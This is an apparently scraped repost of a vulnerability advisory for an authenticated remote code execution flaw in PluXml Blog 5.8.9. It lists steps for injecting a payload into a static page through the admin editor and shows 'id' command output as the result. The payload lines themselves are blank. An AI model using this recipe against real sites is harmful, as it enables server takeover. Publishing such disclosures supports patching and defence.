Published on January 8th, 2024 📆 | 2697 Views ⚑

PluXml Blog 5.8.9 Remote Code Execution – Torchsec

https://www.ispeech.org/text.to.speech

PluXml Blog 5.8.9 Remote Code Execution: Posted Jan 8, 2024; Authored by tmrswrr; PluXml Blog version 5.8.9 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 089ea668c2f217558b9875c3c05adffe8da189418cd26fab4602482252ee201a; Download | Favorite | View

## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)
### Date: 2024-1-7
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://pluxml.org/
### Version : 5.8.9
### Tested on: https://www.softaculous.com/apps/cms/PluXml1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001
Payload : 











2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1
Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

Source link

Tagged with: 5.8.9 • blog • code • execution • pluxml • remote • torchsec

Comments are closed.

PluXml Blog 5.8.9 Remote Code Execution – Torchsec

🌟 Your Account

🔔 Email Subscriptions

Get new posts by email

Donate Via Wallets

Popular

Gloss

☕️Social Media

👥Members

🌍 Forum Groups